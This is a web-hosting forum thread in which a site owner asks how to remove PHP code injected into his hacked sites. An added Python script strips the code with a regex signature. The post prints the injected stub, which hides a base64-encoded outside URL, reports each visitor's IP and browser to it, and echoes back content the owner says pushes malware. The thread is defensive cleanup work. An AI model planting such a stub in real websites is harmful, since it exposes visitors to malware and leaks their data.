
Problem with code inserted in base64_decode php scripts from accounts.

Discussion in 'General Discussion' started by michel.rw, Apr 4, 2012.

michel.rw (Registered; joined Jun 13, 2011)
Hi there, I have a serious problem.

I have several domains hosted in my reseller account, and a few days ago these sites were broken into and the accounts' PHP files were changed.
By checking these changes, I noticed that the following code had been inserted into the files:

<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(st$
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&dom$
            $stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

Analyzing this code, we find that it contains an encrypted link that redirects to a page on a server that installs malware on the visitor's PC.
I urgently need to remove that code, and I cannot find a way to remove it.

I need help.
I learned that with regular expressions it would be easier to remove that code from the affected pages.
     
    #1 michel.rw, Apr 4, 2012
    Last edited: Apr 4, 2012
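The poster asks how a regular expression could strip this stub from every affected file. The script below is an added example written for this thread, not code from the poster or from cPanel. It assumes the injected block always has the shape shown in the post (an opening `<?php`, the `if (!isset($sRetry))` guard, then everything up to the first closing `?>`), and it uses that shape as the detection signature; the sample "infected" file it scans is constructed here, with the real base64 URL replaced by a placeholder, so it runs offline against a temporary directory.

```python
"""Detect and strip the injected '$sRetry' PHP stub from a tree of files.

Added example for this forum thread (not the poster's or cPanel's code).
Assumption: every injected copy starts with '<?php' + 'if (!isset($sRetry))'
and ends at the next '?>', exactly as in the sample posted in the thread.
Variants with a different guard or no closing tag would need their own
signature and should be checked by hand.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Signature of the injected block: the opening tag, the $sRetry guard, then
# the shortest run of anything (DOTALL lets '.' span newlines) up to the
# next closing tag plus the blank lines that follow it.  Hypothetical
# pattern derived from the sample in the thread.
INJECTED_BLOCK = re.compile(
    r"<\?php\s*if\s*\(\s*!isset\(\$sRetry\)\s*\).*?\?>\s*",
    re.DOTALL,
)

# Constructed sample of a hit: an abridged copy of the stub prepended to a
# normal index.php.  The base64 argument is a placeholder, not a real URL.
INJECTED_SAMPLE = """<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
$stCurlHandle = NULL;
if (strstr($sUserAgent, 'google') == false) {
    $stCurlLink = base64_decode('PLACEHOLDER_BASE64') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
    $stCurlHandle = curl_init($stCurlLink);
}
if ($stCurlHandle !== NULL) { curl_close($stCurlHandle); }
}
?>
<?php
// legitimate site code
echo "Hello, world";
"""

# Constructed sample of a file that was never touched.
CLEAN_SAMPLE = '<?php\n// legitimate site code\necho "Hello, world";\n'


def find_injections(source: str) -> list[tuple[int, int]]:
    """Return (start, end) offsets of every injected block in source."""
    return [(m.start(), m.end()) for m in INJECTED_BLOCK.finditer(source)]


def clean_source(source: str) -> tuple[str, int]:
    """Strip every injected block; return (cleaned text, blocks removed)."""
    return INJECTED_BLOCK.subn("", source)


def clean_file(path: Path, dry_run: bool = True) -> int:
    """Clean one file in place; keeps a .bak copy of the original unless dry_run.

    Returns the number of injected blocks found (0 for an untouched file).
    """
    original = path.read_text(encoding="utf-8", errors="surrogateescape")
    cleaned, count = clean_source(original)
    if count and not dry_run:
        backup = path.with_suffix(path.suffix + ".bak")
        backup.write_text(original, encoding="utf-8", errors="surrogateescape")
        path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return count


def scan_tree(root: Path, dry_run: bool = True) -> dict[str, int]:
    """Walk root for *.php files; return {path: blocks found} for every hit."""
    hits: dict[str, int] = {}
    for path in sorted(root.rglob("*.php")):
        count = clean_file(path, dry_run)
        if count:
            hits[str(path.relative_to(root))] = count
    return hits


if __name__ == "__main__":
    # Demo against a throwaway directory: one infected file, one clean file.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "public_html").mkdir()
        (root / "public_html" / "index.php").write_text(INJECTED_SAMPLE)
        (root / "public_html" / "about.php").write_text(CLEAN_SAMPLE)
        print("dry run  :", scan_tree(root, dry_run=True))
        print("cleaned  :", scan_tree(root, dry_run=False))
        print("re-scan  :", scan_tree(root, dry_run=True))  # {} once clean
```

Run it first with `dry_run=True` to get a list of hit files before anything is rewritten; the `.bak` copies let you diff each cleaned file and confirm only the stub was removed. A regex sweep only removes this one artefact, so after cleanup the account still needs its entry point found (FTP or cPanel credentials, an outdated script) and every remaining file checked for other additions.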